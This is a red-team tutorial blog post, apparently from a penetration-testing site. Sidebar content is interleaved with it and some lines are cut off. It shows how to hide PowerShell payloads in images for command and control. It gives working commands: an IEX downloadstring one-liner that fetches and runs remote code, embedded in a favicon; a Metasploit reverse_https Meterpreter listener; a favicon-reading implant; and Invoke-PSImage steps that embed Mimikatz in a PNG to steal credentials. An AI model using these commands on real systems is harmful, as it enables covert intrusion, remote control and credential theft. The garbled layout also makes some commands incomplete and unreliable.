Penetration Testing Lab
Articles from the Pentesting Field
Home Pentesting Distros Resources Submissions Toolkit Contact the Lab
Microsoft Office – NTLM Hashes via Frameset Search the Lab
Search...
Command and Control – Web Interface
Author
January 2, Command and Control – Images
2018
netbiosX Red Team C2, Command and Control, Red Team Leave a comme
netbiosX
Images traditionally have been used as a method of hiding a message. It is possibly for
forensic investigators the oldest trick in the book to search for evidence inside that type of
files. However in offensive security and red teaming pictures can hide commands, Follow PenTest Lab
payloads and scripts.
Enter your email address to follow this blog and
Michael Scott developed a python script which can generate an icon image and embed receive notifications of new posts by email.
into this image a PowerShell command. The first step is to write the command into a text
file. Join 1,667 other followers
1 echo 'IEX((new-object net.webclient).downloadstring("http://19 Enter your email address
Follow
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� Recent Posts
Command and Control – Browser
SPN Discovery
Situational Awareness
Lateral Movement – WinRM
AppLocker Bypass – CMSTP
Favicon – Embedded Command
The next step is to create the favicon which will contain the embedded payload, start the Categories
apache web server and move the icon to a web server directory.
Coding (10)
1 python create_favicon.py shellcode.txt evil.png Defense Evasion (20)
2 service apache2 start
3 mv evil.png /var/www/favicon.ico Exploitation Techniques (19)
External Submissions (3)
General Lab Notes (21)
Information Gathering (12)
Infrastructure (2)
Maintaining Access (4)
Mobile Pentesting (7)
Network Mapping (1)
Post Exploitation (12)
Generation of Favicon Privilege Escalation (14)
Red Team (27)
Metasploit module multi/handler can be used to receive the connection once the Social Engineering (11)
command is executed on the target host. Tools (7)
1 use exploit/multi/handler VoIP (4)
2 set payload windows/meterpreter/reverse_https Web Application (14)
3 set LHOST XXX.XXX.XXX.XXX
4 set LPORT 443 Wireless (2)
Archives
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� June 2018
May 2018
April 2018
January 2018
December 2017
November 2017
October 2017
September 2017
Metasploit – Multi Handler Module for Favicon August 2017
July 2017
The Get-FaviconText PowerShell script will download the icon into a temporary directory June 2017
and it will convert the pixels back to characters in order to execute the payload command.
May 2017
1 Import-Module .\readFavicon.ps1 April 2017
2 Get-FaviconText -URL http://192.168.1.171/favicon.ico -WriteTo
March 2017
February 2017
January 2017
November 2016
September 2016
February 2015
January 2015
Implant – Favicon Configuration July 2014
April 2014
The Get-FaviconText script is actually the implant which needs to be executed on the June 2013
target. Even if permissions are not set on the web directory to access this file the payload May 2013
command inside the icon will still run. April 2013
March 2013
February 2013
January 2013
December 2012
November 2012
October 2012
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� September 2012
August 2012
July 2012
June 2012
April 2012
March 2012
February 2012
Implant – Favicon
A Meterpreter session will open and the target can be controlled through Metasploit. @ Twitter
#BSidesLDN2018 was great so far! Many thanks to
@dradisfw for the ticket #dradis #greatproduct
6 hours ago
Great talk by @john_shier about Dark Web!
#BSidesLDN2018 https://t.co/1yC8lVKn3X
7 hours ago
RT @myexploit2600: I be talking at 14:00 in track 2
@BSidesLondon #BsidesLDN2018 7 hours ago
Finally a social engineering talk #BSidesLDN2018
https://t.co/jMMk4lvbcH 7 hours ago
[New Post] Command and Control - Browser
pentestlab.blog/2018/06/06/com… #pentestlab
Meterpreter via Favicon
#Redteam 9 hours ago
However it is also possible to use other types of images such as JPG in order to embed Follow @netbiosX
not just commands but full PowerShell scripts in order to perform various other post
exploitation activities. Barrett Adams developed a PowerShell module that can use pixels
of a PNG file to embed a PowerShell script. This module will also generate an oneliner Pen Test Lab Stats
command for execution:
3,030,594 hits
1 Import-Module .\Invoke-PSImage.ps1
2 Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg
Blogroll
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� Packetstorm Exploits,Advisories,Tools,Whitepapers
0
Metasploit Latest news about Metasploit Framework
and tutorials 0
0x191unauthorized Tutorials 0
The home of WeBaCoo Information about the
Embedding Mimikatz in PNG – Web Version WeBaCoo and other tutorials 0
Command Line Kung Fu Command Line Tips and
Executing the oneliner will result of running Mimikatz through a PNG file that is stored on a Tricks 0
web server.
Exploit Databases
Exploit Database Exploits,PoC,Shellcodes,Papers
0
Metasploit Database Exploit & Auxiliary Modules 0
Inj3ct0r Database Remote,Local,Web
Apps,Shellcode,PoC 0
Mimikatz via PNG over the Web
Pentest Blogs
Alternatively this script can generate an oneliner for an image that is hosted locally.
Carnal0wnage Ethical Hacking Tutorials 0
1 Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\77.jpg
Coresec Pentest tutorials,Code,Tools 0
Notsosecure From Pentesters To Pentesters 0
Pentestmonkey Cheatsheets,Tools and SQL
Injection 0
Pentester Web Application Testing,Tips,Testing
Tools 0
Packetstorm Exploit Files 0
Embedding Mimikatz in PNG – Local Version
room362 Blatherings of a Security Addict 0
Running the command will execute Mimikatz from the PNG file. darkoperator Shell is only the Beginning 0
Irongeek Hacking Videos,Infosec Articles,Scripts 0
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� Professional
The Official Social Engineering Portal Information
about the Social Engineering Framework,Podcasts
and Resources 0
Next Conference
Mimikatz via PNG – Local
Security B-Sides London
April 29th, 2014
Conclusion
Images can be used to execute shellcode and scripts and perform other activities. There is The big day is here.
a limitation in the number of characters that can be used therefore only images with a lot of
pixels can carry a script. It is an interesting method of hiding payloads in plain sight and a
type of threat that it could be prevented if PowerShell was disabled across the network.
Facebook Page
References
Penetrati…
9.9K likes
https://github.com/et0x/C2
http://rwnin.net/?p=35
https://github.com/peewpw/Invoke-PSImage
Like Page
Be the first of your friends to
like this
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� Advertisements Advertisements
Rate this:
Rate This
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� Share this:
Twitter Facebook 64 LinkedIn Pinterest
Reddit Tumblr Google
Like
Be the first to like this.
Related
Command and Control - Lateral Movement - Command and Control -
Browser WinRM JavaScript
In "Red Team" In "Red Team" In "Red Team"
Leave a Reply
Enter your comment here...
Microsoft Office – NTLM Hashes via Frameset
Command and Control – Web Interface
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
� Blog at WordPress.com.
Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
